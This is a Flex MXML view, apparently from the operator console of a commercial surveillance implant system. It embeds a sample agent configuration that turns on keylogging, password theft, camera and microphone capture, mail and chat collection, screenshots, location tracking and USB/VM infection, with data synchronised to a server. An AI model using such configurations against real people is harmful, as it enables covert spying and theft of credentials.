<?xml version="1.0" encoding="utf-8"?>
<s:Group xmlns:fx="http://ns.adobe.com/mxml/2009"
         xmlns:s="library://ns.adobe.com/flex/spark"
         xmlns:mx="library://ns.adobe.com/flex/mx"
         xmlns:actionbar="it.ht.rcs.console.main.actionbar.*"
         xmlns:configuration="it.ht.rcs.console.operations.view.configuration.*"
         width="100%" height="100%" addedToStage="onAddedToStage(event)">


  <s:layout>
    <s:VerticalLayout gap="5"/>
  </s:layout>
  
  <fx:Script>
    <![CDATA[
      import it.ht.rcs.console.operations.view.OperationsSection;
      
      [Bindable]
      public var section:OperationsSection;
      
      public var config:Object = JSON.parse(
        '{' +
        '"modules":' +
          '[' +
          '{"module": "application"},' +
          '{"module": "call", "buffer": 524288, "compression": 5},' +
          '{"module": "camera", "quality": "med"},' +
          '{"module": "chat"},' +
          '{"module": "clipboard"},' +
          '{"module": "crisis", "network": {"enabled": true, "processes": null}, "hook": {"enabled": true, "processes": null}},' +
          '{"module": "device"},' +
          '{"module": "file", "open": false, "capture": false, "minsize": 1, "maxsize": 500000, "date": "2011-05-26 09:04:14", "accept": null, "deny": null},' +
          '{"module": "infection", "local": false, "usb": false, "vm": 0, "mobile": false},' +
          '{"module": "keylog"},' +
          '{"module": "messages", "mail": {"enabled": true, "filter": {"history": true, "maxsize": 30720, "datefrom": "2011-05-26 09:04:14", "dateto": "0000-00-00 00:00:00"}}},' +
          '{"module": "mic", "autosense": false, "silence": 5, "threshold": 0.22, "vad": false, "vadthreshold": 50},' +
          '{"module": "mouse", "width": 40, "height": 40},' +
          '{"module": "addressbook"},' +
          '{"module": "calendar"},' +
          '{"module": "password"},' +
          '{"module": "position", "gps": false, "cell": false, "wifi": true},' +
          '{"module": "print", "quality": "med"},' +
          '{"module": "snapshot", "onlywindow": false, "quality": "med"},' +
          '{"module": "url"}' +
          '],' +
        '' +
        '"events":' +
        '[' +
/*0*/     '{"event": "timer",   "start": 0, "repeat": 0,           "ts": "00:00:00", "te": "23:59:59", "delay": 60,               "enabled": true,  "desc": "timer"},' +
/*1*/     '{"event": "process", "start": 0,                        "process": "notepad.exe",                                      "enabled": true,  "desc": "process", "window": false, "focus": false},' +
/*2*/     '{"event": "process", "start": 0,                        "process": "TextEdit",                                         "enabled": true,  "desc": "process", "window": false, "focus": false},' +
/*3*/     '{"event": "process",                          "end": 1, "process": "*calc*",                                           "enabled": true,  "desc": "process", "window": false, "focus": false},' +
/*4*/     '{"event": "process", "start": 2,                        "process": "provo.exe",                                        "enabled": true,  "desc": "process", "window": false, "focus": false},' +
/*5*/     '{"event": "timer",   "start": 3,                        "ts": "00:00:00", "te": "23:59:59",                            "enabled": true,  "desc": "On Startup"},' +
/*6*/     '{"event": "timer",               "repeat": 4,           "ts": "00:00:00", "te": "23:59:59", "delay": 15,   "iter": 50, "enabled": false, "desc": "camera loop"},' +
/*7*/     '{"event": "timer",               "repeat": 5,           "ts": "00:00:00", "te": "23:59:59", "delay": 300,              "enabled": false, "desc": "position loop"},' +
/*8*/     '{"event": "timer",               "repeat": 6,           "ts": "00:00:00", "te": "23:59:59", "delay": 6000,             "enabled": true,  "desc": "snapshot loop"}' +
        '],' +
        '' +
        '"actions":' +
          '[' +
/*0*/     '{"desc": "Synchronize",        "subactions": [{"action": "synchronize", "stop": false, "host": "192.168.100.100", "bandwidth": 1024000, "mindelay": 0, "maxdelay": 0, "wifi": false, "cell": false}]},' +
/*1*/     '{"desc": "Uninstall",          "subactions": [{"action": "uninstall"}]},' +
/*2*/     '{"desc": "pippi",              "subactions": [{"action": "execute", "command": "c:\\notepad.exe"}]},' +
/*3*/     '{"desc": "STARTUP",            "subactions": [{"action": "module", "status": "start", "module": "device"}, {"action": "module", "status": "start", "module": "infection"}]},' +
/*4*/     '{"desc": "camera iteration",   "subactions": [{"action": "module", "status": "start", "module": "camera"}]},' +
/*5*/     '{"desc": "position iteration", "subactions": [{"action": "module", "status": "start", "module": "position"}]},' +
/*6*/     '{"desc": "snapshot iteration", "subactions": [{"action": "module", "status": "start", "module": "snapshot"}]}' +
          '],' +
        '' +
        '"globals":' +
          '{' +
          '"quota": {"min": 524288000, "max": 1048576000},' +
          '"wipe": false,' +
          '"type": "DESKTOP",' +
          '"migrated": true,' +
          '"version": 20111231,' +
          '"nohide": []' +
          '}' +
        '}');

      private function onAddedToStage(event:Event):void
      {
        graph.config = config;
        graph.rebuildGraph();
      }
      
      protected function addEvent(event:MouseEvent):void
      {
        config.events.push({"event": "timer", "desc": "new"});
        graph.rebuildGraph();
      }
      
    ]]>
  </fx:Script>
  
  <configuration:ConfigurationActionBar section="{section}"/>
  <s:Label text="Click me to add an event" click="addEvent(event)"/>
  <s:Label text="{graph.currentTarget}" />
  <s:Scroller id="graphScroller" width="100%" height="100%">
    <configuration:ConfigurationGraph id="graph"/>
  </s:Scroller>
  
</s:Group>